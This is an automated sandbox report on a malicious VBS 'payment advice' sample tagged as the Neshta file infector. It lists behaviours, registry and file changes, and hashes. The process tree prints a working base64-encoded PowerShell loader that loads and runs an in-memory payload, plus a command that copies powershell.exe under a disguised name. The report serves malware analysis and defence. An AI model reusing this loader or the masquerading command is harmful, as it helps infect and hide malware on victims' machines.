Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-12-2024 09:51
Static task
static1
Behavioral task
behavioral1
Sample
PaymentAdvice-1629043.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
PaymentAdvice-1629043.vbs
Resource
win10v2004-20241007-en
General
-
Target
PaymentAdvice-1629043.vbs
-
Size
2.3MB
-
MD5
9d7aa394cb39af2a434eb3036a35bb47
-
SHA1
bfcb9a3f1dcbcfce2f66f4c5c0e8dbada27dbd9f
-
SHA256
490022706b76b904dfe979627f775cc2be0cd6a10ae623989cf2118026a21bea
-
SHA512
3b2da959a16b915d52ceadb8336fc5478e7d579a38cf59fe34f15744a0017ea9907bf5b62b4670ea123b223a0af7f3e96ab03d132055a1afd8e6983a4f856033
-
SSDEEP
24576:dGPQzVpL6fvkC6MugzlGbhhkg6XCoCK86uTK6ClN3Br6kXIEHIQCobtMvQ8rAOSP:dGcJXxTqb38jR/4RzGfFVvC
Malware Config
Signatures
-
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
Neshta family
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3204 4804 cmd.exe 82 -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2236 created 3356 2236 PaymentAdvice-1629043.vbs.exe 55 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Value.vbs PaymentAdvice-1629043.vbs.exe -
Executes dropped EXE 1 IoCs
pid Process 2236 PaymentAdvice-1629043.vbs.exe -
Modifies system executable filetype association 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" InstallUtil.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2236 set thread context of 4416 2236 PaymentAdvice-1629043.vbs.exe 89 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOF5E2~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe InstallUtil.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MIA062~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe InstallUtil.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\WINDOW~2\wab.exe InstallUtil.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe InstallUtil.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe InstallUtil.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MI9C33~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe InstallUtil.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmlaunch.exe InstallUtil.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\MOZILL~1\UNINST~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe InstallUtil.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe InstallUtil.exe File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE InstallUtil.exe File opened for modification C:\PROGRA~3\PACKAG~1\{D87AE~1\WINDOW~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~3\PACKAG~1\{EF5AF~1\WINDOW~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe InstallUtil.exe File opened for modification C:\PROGRA~2\Google\Update\DISABL~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~4.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe InstallUtil.exe File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe InstallUtil.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE InstallUtil.exe File opened for modification C:\PROGRA~3\PACKAG~1\{63880~1\WINDOW~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe InstallUtil.exe File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe InstallUtil.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe InstallUtil.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe InstallUtil.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmprph.exe InstallUtil.exe File opened for modification C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe InstallUtil.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~4.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe InstallUtil.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe InstallUtil.exe File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe InstallUtil.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE InstallUtil.exe File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe InstallUtil.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE InstallUtil.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\svchost.com InstallUtil.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PaymentAdvice-1629043.vbs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" InstallUtil.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2236 PaymentAdvice-1629043.vbs.exe 2236 PaymentAdvice-1629043.vbs.exe 2236 PaymentAdvice-1629043.vbs.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2236 PaymentAdvice-1629043.vbs.exe Token: SeDebugPrivilege 2236 PaymentAdvice-1629043.vbs.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 4612 wrote to memory of 2236 4612 WScript.exe 85 PID 4612 wrote to memory of 2236 4612 WScript.exe 85 PID 4612 wrote to memory of 2236 4612 WScript.exe 85 PID 2236 wrote to memory of 4416 2236 PaymentAdvice-1629043.vbs.exe 89 PID 2236 wrote to memory of 4416 2236 PaymentAdvice-1629043.vbs.exe 89 PID 2236 wrote to memory of 4416 2236 PaymentAdvice-1629043.vbs.exe 89 PID 2236 wrote to memory of 4416 2236 PaymentAdvice-1629043.vbs.exe 89 PID 2236 wrote to memory of 4416 2236 PaymentAdvice-1629043.vbs.exe 89 PID 2236 wrote to memory of 4416 2236 PaymentAdvice-1629043.vbs.exe 89 PID 2236 wrote to memory of 4416 2236 PaymentAdvice-1629043.vbs.exe 89 PID 2236 wrote to memory of 4416 2236 PaymentAdvice-1629043.vbs.exe 89 PID 2236 wrote to memory of 4416 2236 PaymentAdvice-1629043.vbs.exe 89 PID 2236 wrote to memory of 4416 2236 PaymentAdvice-1629043.vbs.exe 89 PID 2236 wrote to memory of 4416 2236 PaymentAdvice-1629043.vbs.exe 89
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3356
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe"C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe" -enc JABKAG0AcgBwAHAAYwB1AGIAcgBtAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQASABvAHMAZABjAHQAaABsAHYAdABvACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQASgBtAHIAcABwAGMAdQBiAHIAbQBtACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAFcAawBmAGMAbABsAGgAagB4ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAbwBzAGQAYwB0AGgAbAB2AHQAbwAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAQwBnAGwAYQBrAGgAegByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABXAGsAZgBjAGwAbABoAGoAeAAgACkAOwAkAEMAbQBqAHAAegB5AHYAcABjAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFUAbgB0AGkAcABmACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEMAZwBsAGEAawBoAHoAcgAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAVQBuAHQAaQBwAGYALgBDAG8AcAB5AFQAbwAoACAAJABDAG0AagBwAHoAeQB2AHAAYwBzACAAKQA7ACQAVQBuAHQAaQBwAGYALgBDAGwAbwBzAGUAKAApADsAJABDAGcAbABhAGsAaAB6AHIALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABXAGsAZgBjAGwAbABoAGoAeAAgAD0AIAAkAEMAbQBqAHAAegB5AHYAcABjAHMALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFcAawBmAGMAbABsAGgAagB4ACkAOwAgACQATwByAHkAbABnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAVwBrAGYAYwBsAGwAaABqAHgAKQA7ACAAJABHAGIAZwBrAGYAdABxAHAAIAA9ACAAJABPAHIAeQBsAGcALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABHAGIAZwBrAGYAdABxAHAALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEcAYgBnAGsAZgB0AHEAcAAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2236
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- Modifies system executable filetype association
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4416
-
-
C:\Windows\system32\cmd.execmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe" /Y1⤵
- Process spawned unexpected child process
PID:3204
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
86KB
MD5a19e4a96ec5d5485b9574701f725b974
SHA19473682ece20859be37bd4e4217f47596fe305d7
SHA25629d948687548a1374710fd24591ea81a5e3bcddf52b2a121c9627704f2f98e97
SHA51273aabc378bd230e5383587ccbf9d1bb4d1e25f9880097d6204e8de5b4457e903ea5351bf10dddaa14c4650a4d91172495d8f5f06e63473f8bc43d1442db286e3
-
Filesize
40KB
MD57fe6fb5408992330ada9cd81be35c33b
SHA12f732ea754fa43dea05fdad5c821f008a92935e2
SHA2568b53f3559183d6206e2573a0c3813141cad7621ee93a5241c622cf7c664d9aee
SHA512630cd455c5c4367e7d4a423d78b69e8f8ca02aa16b2af65d7357420511a692b233c04dc5d8aaafe3eb477b57a37a3ed0ee5b807a66c6fbaa223ac0abd22176ec
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82